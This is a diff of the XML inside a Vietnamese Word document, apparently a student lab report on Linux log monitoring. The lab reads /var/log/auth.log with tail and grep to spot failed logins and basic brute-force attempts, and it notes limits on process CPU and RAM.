-        <w:t>ứng</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>tự</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>động</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>- Nếu là hệ thống thật thì cần xử lý gì thêm?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>+ Hạn chế lạm dụng kill -9</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>+ Điều tra nguồn gốc</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>+ Thiết lập giới hạn: CPU, RAM tối đa một tiến trình được phép sử dụng</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>+ Triển khai hệ thống giám sát và phản ứng tự động</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4533,49 +992,16 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>M</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ụ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>c tiêu:</w:t>
+        <w:t>Mục tiêu:</w:t>
       </w:r>
       <w:r>
         <w:br/>
-        <w:t>Đ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ọ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>c log và tìm login fail</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Các</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> bư</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ớ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>c th</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ự</w:t>
-      </w:r>
-      <w:r>
-        <w:t>c hi</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ệ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>n:</w:t>
+        <w:t>Đọc log và tìm login fail</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Các bước thực hiện:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4583,13 +1009,7 @@
         <w:pStyle w:val="ListNumber"/>
       </w:pPr>
       <w:r>
-        <w:t>Bư</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ớ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>c 1: Theo dõi auth.log</w:t>
+        <w:t>Bước 1: Theo dõi auth.log</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4602,25 +1022,7 @@
         <w:pStyle w:val="ListNumber"/>
       </w:pPr>
       <w:r>
-        <w:t>Bư</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ớ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>c 2: M</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ở</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> terminal m</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ớ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>i</w:t>
+        <w:t>Bước 2: Mở terminal mới</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4633,19 +1035,7 @@
         <w:pStyle w:val="ListNumber"/>
       </w:pPr>
       <w:r>
-        <w:t>Bư</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ớ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>c 3: Th</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ử</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> login sai</w:t>
+        <w:t>Bước 3: Thử login sai</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4658,39 +1048,19 @@
         <w:pStyle w:val="ListNumber"/>
       </w:pPr>
       <w:r>
-        <w:t>Bư</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ớ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>c 4: Nh</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ậ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>p sai password vài l</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ầ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>n</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>sai</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> password</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
+        <w:t>Bước 4: Nhập sai password vài lần</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>sai password</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4A3D2F6E" wp14:editId="241C8D04">
@@ -4734,35 +1104,19 @@
         <w:pStyle w:val="ListNumber"/>
       </w:pPr>
       <w:r>
-        <w:t>Bư</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ớ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>c 5: Quan sát log</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>grep</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> 'Failed password' /</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>var</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>/log/auth.log</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
+        <w:t>Bước 5: Quan sát log</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>grep 'Failed password' /var/log/auth.log</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="780A00F3" wp14:editId="43C535BA">
             <wp:extent cx="5486400" cy="838200"/>
@@ -4802,25 +1156,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>K</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ế</w:t>
-      </w:r>
-      <w:r>
-        <w:t>t qu</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ả</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> mong đ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ợ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>i:</w:t>
+        <w:t>Kết quả mong đợi:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4828,13 +1164,7 @@
         <w:pStyle w:val="ListBullet"/>
       </w:pPr>
       <w:r>
-        <w:t>Th</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ấ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>y Failed password</w:t>
+        <w:t>Thấy Failed password</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4842,19 +1172,7 @@
         <w:pStyle w:val="ListBullet"/>
       </w:pPr>
       <w:r>
-        <w:t>Hi</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ể</w:t>
-      </w:r>
-      <w:r>
-        <w:t>u brute force cơ b</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ả</w:t>
-      </w:r>
-      <w:r>
-        <w:t>n</w:t>
+        <w:t>Hiểu brute force cơ bản</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4862,19 +1180,7 @@
         <w:pStyle w:val="ListBullet"/>
       </w:pPr>
       <w:r>
-        <w:t>Bi</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ế</w:t>
-      </w:r>
-      <w:r>
-        <w:t>t đ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ọ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>c auth.log</w:t>
+        <w:t>Biết đọc auth.log</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4884,980 +1190,84 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">- Command </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>nào</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>quan</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>tr</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ọ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ng</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>nh</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ấ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>t</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>?</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">+ </w:t>
-      </w:r>
-      <w:r>
-        <w:t>tail -f /</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>var</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>/log/auth.log</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">: </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>lệnh</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>quan</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>trọng</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>nhất</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>cho</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>việc</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t>- Command nào quan trọng nhất?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">+ tail -f /var/log/auth.log: </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">lệnh quan trọng nhất cho việc </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:bCs/>
         </w:rPr>
-        <w:t>giám</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>giám sát thời gian thực</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">+ grep: lệnh quan trọng nhất cho việc </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:bCs/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t>điều tra</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+        <w:t>- Output nào cần chú ý?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>+ Thời gian: diễn ra khi nào? Khoảng cách giữa các lần "Failed" là bao lâu?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">+ </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:bCs/>
         </w:rPr>
-        <w:t>sát</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>thời</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>gian</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>thực</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">+ </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>grep</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">: </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>lệnh</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>quan</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>trọng</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>nhất</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>cho</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>việc</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>điều</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>tra</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>Tài khoản mục tiêu:</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> Kẻ tấn công đang nhắm vào ai</w:t>
+      </w:r>
       <w:r>
         <w:br/>
-        <w:t xml:space="preserve">- Output </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>nào</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>c</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ầ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>n</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>chú</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> ý?</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">+ </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Thời</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>gian</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">: </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>diễn</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>ra</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>khi</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>nào</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">? </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Khoảng</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>cách</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>giữa</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>các</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>lần</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> "Failed" </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>là</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>bao</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>lâu</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>?</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">+ </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Tài</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>khoản</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>mụ</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>c</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>tiêu</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>:</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Kẻ</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>tấn</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>công</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>đang</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>nhắm</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>vào</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>ai</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>- Có rủi ro bảo mật nào?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Biểu hiện tấn công dò mật khẩu</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>+ Mối đe dọa: Kẻ tấn công sử dụng các công cụ tự động</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>+ Rủi ro: Mật khẩu yếu dễ bị xâm nhập</w:t>
+      </w:r>
       <w:r>
         <w:br/>
-        <w:t xml:space="preserve">- </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Có</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> r</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ủ</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">i </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>ro</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>b</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ả</w:t>
-      </w:r>
-      <w:r>
-        <w:t>o</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>m</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ậ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>t</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>nào</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>?</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Biểu</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>hiện</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>tấn</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>công</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>dò</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>mật</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>khẩu</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">+ </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Mối</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>đe</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>dọa</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">: </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Kẻ</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>tấn</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>công</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>sử</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>dụng</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>các</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>công</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
